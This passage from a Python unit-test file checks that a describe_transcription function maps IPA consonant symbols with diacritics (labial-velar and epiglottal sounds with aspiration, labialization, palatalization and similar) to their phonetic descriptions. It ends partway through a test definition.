def test_wʷ_is_the_representation_of_the_voiced_labialized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced labialized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("wʷ")
self.assertEqual(actual, expected)
# voiced palatalized labial-velar approximant pulmonic egressive consonant
def test_wʲ_is_the_representation_of_the_voiced_palatalized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced palatalized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("wʲ")
self.assertEqual(actual, expected)
# voiced velarized labial-velar approximant pulmonic egressive consonant
def test_wˠ_is_the_representation_of_the_voiced_velarized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced velarized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("wˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized labial-velar approximant pulmonic egressive consonant
def test_wˤ_is_the_representation_of_the_voiced_pharyngealized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("wˤ")
self.assertEqual(actual, expected)
# voiced aspirated labial-velar approximant pulmonic egressive consonant
def test_wʰ_is_the_representation_of_the_voiced_aspirated_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("wʰ")
self.assertEqual(actual, expected)
def test_w̬ʰ_is_the_representation_of_the_voiced_aspirated_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("w̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized labial-velar approximant pulmonic egressive consonant
def test_wʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("wʰʷ")
self.assertEqual(actual, expected)
def test_w̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("w̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized labial-velar approximant pulmonic egressive consonant
def test_wʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("wʰʲ")
self.assertEqual(actual, expected)
def test_w̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("w̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized labial-velar approximant pulmonic egressive consonant
def test_wʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("wʰˠ")
self.assertEqual(actual, expected)
def test_w̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("w̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized labial-velar approximant pulmonic egressive consonant
def test_wʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("wʰˤ")
self.assertEqual(actual, expected)
def test_w̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("w̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless labial-velar fricative pulmonic egressive consonant
def test_ʍ_is_the_representation_of_the_voiceless_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ")
self.assertEqual(actual, expected)
def test_ʍ̊_is_the_representation_of_the_voiceless_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̊")
self.assertEqual(actual, expected)
def test_ʍ̥_is_the_representation_of_the_voiceless_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̥")
self.assertEqual(actual, expected)
# voiceless labialized labial-velar fricative pulmonic egressive consonant
def test_ʍʷ_is_the_representation_of_the_voiceless_labialized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍʷ")
self.assertEqual(actual, expected)
def test_ʍ̊ʷ_is_the_representation_of_the_voiceless_labialized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̊ʷ")
self.assertEqual(actual, expected)
def test_ʍ̥ʷ_is_the_representation_of_the_voiceless_labialized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized labial-velar fricative pulmonic egressive consonant
def test_ʍʲ_is_the_representation_of_the_voiceless_palatalized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍʲ")
self.assertEqual(actual, expected)
def test_ʍ̊ʲ_is_the_representation_of_the_voiceless_palatalized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̊ʲ")
self.assertEqual(actual, expected)
def test_ʍ̥ʲ_is_the_representation_of_the_voiceless_palatalized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized labial-velar fricative pulmonic egressive consonant
def test_ʍˠ_is_the_representation_of_the_voiceless_velarized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍˠ")
self.assertEqual(actual, expected)
def test_ʍ̊ˠ_is_the_representation_of_the_voiceless_velarized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̊ˠ")
self.assertEqual(actual, expected)
def test_ʍ̥ˠ_is_the_representation_of_the_voiceless_velarized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized labial-velar fricative pulmonic egressive consonant
def test_ʍˤ_is_the_representation_of_the_voiceless_pharyngealized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍˤ")
self.assertEqual(actual, expected)
def test_ʍ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̊ˤ")
self.assertEqual(actual, expected)
def test_ʍ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated labial-velar fricative pulmonic egressive consonant
def test_ʍʰ_is_the_representation_of_the_voiceless_aspirated_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized labial-velar fricative pulmonic egressive consonant
def test_ʍʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized labial-velar fricative pulmonic egressive consonant
def test_ʍʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized labial-velar fricative pulmonic egressive consonant
def test_ʍʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized labial-velar fricative pulmonic egressive consonant
def test_ʍʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍʰˤ")
self.assertEqual(actual, expected)
# voiced labial-velar fricative pulmonic egressive consonant
def test_ʍ̬_is_the_representation_of_the_voiced_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̬")
self.assertEqual(actual, expected)
def test_ʍ̬_is_the_representation_of_the_voiced_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̬")
self.assertEqual(actual, expected)
# voiced labialized labial-velar fricative pulmonic egressive consonant
def test_ʍ̬ʷ_is_the_representation_of_the_voiced_labialized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̬ʷ")
self.assertEqual(actual, expected)
def test_ʍ̬ʷ_is_the_representation_of_the_voiced_labialized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced labialized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized labial-velar fricative pulmonic egressive consonant
def test_ʍ̬ʲ_is_the_representation_of_the_voiced_palatalized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̬ʲ")
self.assertEqual(actual, expected)
def test_ʍ̬ʲ_is_the_representation_of_the_voiced_palatalized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced palatalized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized labial-velar fricative pulmonic egressive consonant
def test_ʍ̬ˠ_is_the_representation_of_the_voiced_velarized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̬ˠ")
self.assertEqual(actual, expected)
def test_ʍ̬ˠ_is_the_representation_of_the_voiced_velarized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced velarized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized labial-velar fricative pulmonic egressive consonant
def test_ʍ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̬ˤ")
self.assertEqual(actual, expected)
def test_ʍ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated labial-velar fricative pulmonic egressive consonant
def test_ʍ̬ʰ_is_the_representation_of_the_voiced_aspirated_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized labial-velar fricative pulmonic egressive consonant
def test_ʍ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized labial-velar fricative pulmonic egressive consonant
def test_ʍ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized labial-velar fricative pulmonic egressive consonant
def test_ʍ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized labial-velar fricative pulmonic egressive consonant
def test_ʍ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_labial_velar_fricative_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized labial-velar fricative pulmonic egressive consonant"
actual = describe_transcription("ʍ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless epiglottal plosive pulmonic egressive consonant
def test_ʡ_is_the_representation_of_the_voiceless_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ")
self.assertEqual(actual, expected)
def test_ʡ̊_is_the_representation_of_the_voiceless_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̊")
self.assertEqual(actual, expected)
def test_ʡ̥_is_the_representation_of_the_voiceless_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̥")
self.assertEqual(actual, expected)
# voiceless labialized epiglottal plosive pulmonic egressive consonant
def test_ʡʷ_is_the_representation_of_the_voiceless_labialized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡʷ")
self.assertEqual(actual, expected)
def test_ʡ̊ʷ_is_the_representation_of_the_voiceless_labialized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̊ʷ")
self.assertEqual(actual, expected)
def test_ʡ̥ʷ_is_the_representation_of_the_voiceless_labialized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless labialized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized epiglottal plosive pulmonic egressive consonant
def test_ʡʲ_is_the_representation_of_the_voiceless_palatalized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡʲ")
self.assertEqual(actual, expected)
def test_ʡ̊ʲ_is_the_representation_of_the_voiceless_palatalized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̊ʲ")
self.assertEqual(actual, expected)
def test_ʡ̥ʲ_is_the_representation_of_the_voiceless_palatalized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized epiglottal plosive pulmonic egressive consonant
def test_ʡˠ_is_the_representation_of_the_voiceless_velarized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡˠ")
self.assertEqual(actual, expected)
def test_ʡ̊ˠ_is_the_representation_of_the_voiceless_velarized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̊ˠ")
self.assertEqual(actual, expected)
def test_ʡ̥ˠ_is_the_representation_of_the_voiceless_velarized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless velarized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized epiglottal plosive pulmonic egressive consonant
def test_ʡˤ_is_the_representation_of_the_voiceless_pharyngealized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡˤ")
self.assertEqual(actual, expected)
def test_ʡ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̊ˤ")
self.assertEqual(actual, expected)
def test_ʡ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated epiglottal plosive pulmonic egressive consonant
def test_ʡʰ_is_the_representation_of_the_voiceless_aspirated_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized epiglottal plosive pulmonic egressive consonant
def test_ʡʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized epiglottal plosive pulmonic egressive consonant
def test_ʡʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized epiglottal plosive pulmonic egressive consonant
def test_ʡʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized epiglottal plosive pulmonic egressive consonant
def test_ʡʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡʰˤ")
self.assertEqual(actual, expected)
# voiced epiglottal plosive pulmonic egressive consonant
def test_ʡ̬_is_the_representation_of_the_voiced_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̬")
self.assertEqual(actual, expected)
def test_ʡ̬_is_the_representation_of_the_voiced_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̬")
self.assertEqual(actual, expected)
# voiced labialized epiglottal plosive pulmonic egressive consonant
def test_ʡ̬ʷ_is_the_representation_of_the_voiced_labialized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̬ʷ")
self.assertEqual(actual, expected)
def test_ʡ̬ʷ_is_the_representation_of_the_voiced_labialized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced labialized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̬ʷ")
self.assertEqual(actual, expected)
# voiced palatalized epiglottal plosive pulmonic egressive consonant
def test_ʡ̬ʲ_is_the_representation_of_the_voiced_palatalized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̬ʲ")
self.assertEqual(actual, expected)
def test_ʡ̬ʲ_is_the_representation_of_the_voiced_palatalized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced palatalized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̬ʲ")
self.assertEqual(actual, expected)
# voiced velarized epiglottal plosive pulmonic egressive consonant
def test_ʡ̬ˠ_is_the_representation_of_the_voiced_velarized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̬ˠ")
self.assertEqual(actual, expected)
def test_ʡ̬ˠ_is_the_representation_of_the_voiced_velarized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced velarized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̬ˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized epiglottal plosive pulmonic egressive consonant
def test_ʡ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̬ˤ")
self.assertEqual(actual, expected)
def test_ʡ̬ˤ_is_the_representation_of_the_voiced_pharyngealized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̬ˤ")
self.assertEqual(actual, expected)
# voiced aspirated epiglottal plosive pulmonic egressive consonant
def test_ʡ̬ʰ_is_the_representation_of_the_voiced_aspirated_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized epiglottal plosive pulmonic egressive consonant
def test_ʡ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized epiglottal plosive pulmonic egressive consonant
def test_ʡ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized epiglottal plosive pulmonic egressive consonant
def test_ʡ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized epiglottal plosive pulmonic egressive consonant
def test_ʡ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_epiglottal_plosive_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized epiglottal plosive pulmonic egressive consonant"
actual = describe_transcription("ʡ̬ʰˤ")
self.assertEqual(actual, expected)
# voiceless epiglottal fricative pulmonic egressive consonant
def test_ʜ_is_the_representation_of_the_voiceless_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ")
self.assertEqual(actual, expected)
def test_ʜ̊_is_the_representation_of_the_voiceless_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̊")
self.assertEqual(actual, expected)
def test_ʜ̥_is_the_representation_of_the_voiceless_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̥")
self.assertEqual(actual, expected)
def test_ʢ̊_is_the_representation_of_the_voiceless_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̊")
self.assertEqual(actual, expected)
def test_ʢ̥_is_the_representation_of_the_voiceless_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̥")
self.assertEqual(actual, expected)
# voiceless labialized epiglottal fricative pulmonic egressive consonant
def test_ʜʷ_is_the_representation_of_the_voiceless_labialized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜʷ")
self.assertEqual(actual, expected)
def test_ʜ̊ʷ_is_the_representation_of_the_voiceless_labialized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̊ʷ")
self.assertEqual(actual, expected)
def test_ʜ̥ʷ_is_the_representation_of_the_voiceless_labialized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̥ʷ")
self.assertEqual(actual, expected)
def test_ʢ̊ʷ_is_the_representation_of_the_voiceless_labialized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̊ʷ")
self.assertEqual(actual, expected)
def test_ʢ̥ʷ_is_the_representation_of_the_voiceless_labialized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless labialized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized epiglottal fricative pulmonic egressive consonant
def test_ʜʲ_is_the_representation_of_the_voiceless_palatalized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜʲ")
self.assertEqual(actual, expected)
def test_ʜ̊ʲ_is_the_representation_of_the_voiceless_palatalized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̊ʲ")
self.assertEqual(actual, expected)
def test_ʜ̥ʲ_is_the_representation_of_the_voiceless_palatalized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̥ʲ")
self.assertEqual(actual, expected)
def test_ʢ̊ʲ_is_the_representation_of_the_voiceless_palatalized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̊ʲ")
self.assertEqual(actual, expected)
def test_ʢ̥ʲ_is_the_representation_of_the_voiceless_palatalized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized epiglottal fricative pulmonic egressive consonant
def test_ʜˠ_is_the_representation_of_the_voiceless_velarized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜˠ")
self.assertEqual(actual, expected)
def test_ʜ̊ˠ_is_the_representation_of_the_voiceless_velarized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̊ˠ")
self.assertEqual(actual, expected)
def test_ʜ̥ˠ_is_the_representation_of_the_voiceless_velarized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʜ̥ˠ")
self.assertEqual(actual, expected)
def test_ʢ̊ˠ_is_the_representation_of_the_voiceless_velarized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̊ˠ")
self.assertEqual(actual, expected)
def test_ʢ̥ˠ_is_the_representation_of_the_voiceless_velarized_epiglottal_fricative_pulmonic_egressive_consonant(self):
expected = "voiceless velarized epiglottal fricative pulmonic egressive consonant"
actual = describe_transcription("ʢ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized epiglottal fricative pulmonic egressive consonant
def test_ʜˤ_is_the_representation_of_the_voiceless_pharyngealized_epiglottal_fricative_pulmonic_egressive_consonant(self):
